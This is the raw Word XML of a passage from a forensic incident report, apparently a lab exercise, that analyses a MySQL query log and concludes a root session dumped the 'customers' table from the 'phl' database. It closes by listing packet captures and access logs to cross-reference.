          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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4. Conclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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No Evidence of Data Tampering: The log does  not show any signs of data tampering, such as unauthorized  modifications, deletions, or additions to the database.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Exfiltration Confirmed: The attacker successfully exfiltrated data from the customers table by performing a full dump of the table at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">03:01:46.775014Z.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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No New Tables or Records: There is no evidence that the attacker added new tables or records to the database.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Key Observations with Timestamps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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9</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03:00:55.682704Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: User </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">root@localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> connects to the database.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03:00:55.682973Z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@@version_comment limit 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (checks MySQL version).</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03:00:58.206501Z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databases</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lists all databases).</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03:01:02.431377Z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DATABASE()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (checks the current database).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03:01:02.431609Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Switches to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 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Init DB mysql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03:01:02.432402Z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databases</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lists databases again).</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03:01:02.433075Z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tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lists tables in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03:01:02.437115Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">03:01:02.459358Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Queries to list fields from various system tables (e.g.,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db</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tables_priv</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03:01:07.373140Z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tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lists tables in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> database again).</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03:01:10.167274Z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 FROM user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (retrieves all records from the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03:01:13.274571Z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DATABASE()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (checks the current database).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03:01:13.274934Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Switches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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Init DB phl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03:01:13.275849Z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databases</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lists databases).</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03:01:13.276443Z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tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lists tables in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03:01:13.277190Z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Field List customers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lists fields in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03:01:15.536553Z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tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lists tables in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again).</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03:01:21.694024Z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 FROM customers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (retrieves all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03:01:31.159492Z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 FROM customers LIMIT 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (retrieves the first 5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03:01:34.242985Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: User disconnects (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Quit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Session 10</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03:01:46.748188Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: User </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">root@localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> connects to the database.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03:01:46.748326Z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/*!40100 SET @@SQL_MODE='' */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sets SQL mode).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03:01:46.748435Z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/*!40103 SET TIME_ZONE='+00:00' */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sets time zone).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03:01:46.748574Z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/*!80000 SET SESSION information_schema_stats_expiry=0 */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (disables stats expiration).</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03:01:46.748680Z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NET_READ_TIMEOUT= 86400, SESSION NET_WRITE_TIMEOUT= 86400</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sets network timeouts).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03:01:46.748820Z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VARIABLES LIKE 'gtid\_mode'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (checks GTID mode).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03:01:46.753077Z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LOGFILE_GROUP_NAME, FILE_NAME, TOTAL_EXTENTS, INITIAL_SIZE, ENGINE, EXTRA FROM INFORMATION_SCHEMA.FILES WHERE ENGINE = 'ndbcluster' AND FILE_TYPE = 'UNDO LOG' AND FILE_NAME IS NOT NULL AND LOGFILE_GROUP_NAME IS NOT NULL AND LOGFILE_GROUP_NAME IN (SE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LECT DISTINCT LOGFILE_GROUP_NAME FROM INFORMATION_SCHEMA.FILES WHERE ENGINE = 'ndbcluster' AND FILE_TYPE = 'DATAFILE' AND TABLESPACE_NAME IN (SELECT DISTINCT TABLESPACE_NAME FROM INFORMATION_SCHEMA.PARTITIONS WHERE TABLE_SCHEMA IN ('phl'))) GROUP BY LOGFIL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">E_GROUP_NAME, FILE_NAME, ENGINE, TOTAL_EXTENTS, INITIAL_SIZE ORDER BY LOGFILE_GROUP_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (complex query related to NDB cluster).</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03:01:46.756231Z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DISTINCT TABLESPACE_NAME, FILE_NAME, LOGFILE_GROUP_NAME, EXTENT_SIZE, INITIAL_SIZE, ENGINE FROM INFORMATION_SCHEMA.FILES WHERE FILE_TYPE = 'DATAFILE' AND TABLESPACE_NAME IN (SELECT DISTINCT TABLESPACE_NAME FROM INFORMATION_SCHEMA.PARTITIONS WHERE TA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">BLE_SCHEMA IN ('phl')) ORDER BY TABLESPACE_NAME, LOGFILE_GROUP_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (another complex query related to NDB cluster).</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03:01:46.757327Z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VARIABLES LIKE 'ndbinfo\_version'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (checks NDB version).</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03:01:46.763600Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Switches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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Init DB phl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03:01:46.763710Z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tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lists tables in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03:01:46.765171Z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LOCK TABLES customers READ /*!32311 LOCAL */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (locks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for reading).</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03:01:46.769709Z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table status like 'customers'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (checks the status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03:01:46.772197Z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SQL_QUOTE_SHOW_CREATE=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (enables quoting in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SHOW CREATE TABLE</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03:01:46.772305Z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'binary'</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03:01:46.772375Z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create table customers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (retrieves the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement for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03:01:46.772772Z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'utf8mb4'</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03:01:46.772883Z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fields from customers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lists fields in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03:01:46.774238Z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fields from customers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lists fields in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again).</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03:01:46.775014Z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/*!40001 SQL_NO_CACHE */ * FROM customers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (dumps all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03:01:46.775651Z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'binary'</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03:01:46.775720Z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use phl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (switches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03:01:46.775799Z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@@collation_database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (checks the database collation).</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03:01:46.775886Z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SHOW TRIGGERS LIKE 'customers'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (checks for triggers on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03:01:46.777051Z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'utf8mb4'</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03:01:46.777108Z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'binary'</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03:01:46.777571Z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SELECT COLUMN_NAME, JSON_EXTRACT(HISTOGRAM, '$."number-of-buckets-specified"') FROM information_schema.COLUMN_STATISTICS WHERE SCHEMA_NAME = 'phl' AND TABLE_NAME = 'customers'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (retrieves column statistics for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03:01:46.778175Z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SET SESSION character_set_results = 'utf8mb4'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sets character set for results).</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03:01:46.778230Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Query: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNLOCK TABLES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (unlocks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03:01:46.782060Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: User disconnects (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Quit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Cross-Reference Findings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To build a comprehensive picture of the incident, we need to correlate findings from the following artifacts:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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Wireshark PCAP Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (phlwebserver.pcap and phldatabase.pcap)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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Web Server Access Logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (phl_access_log.txt)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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Access Logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (phl_database_access_log.txt)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
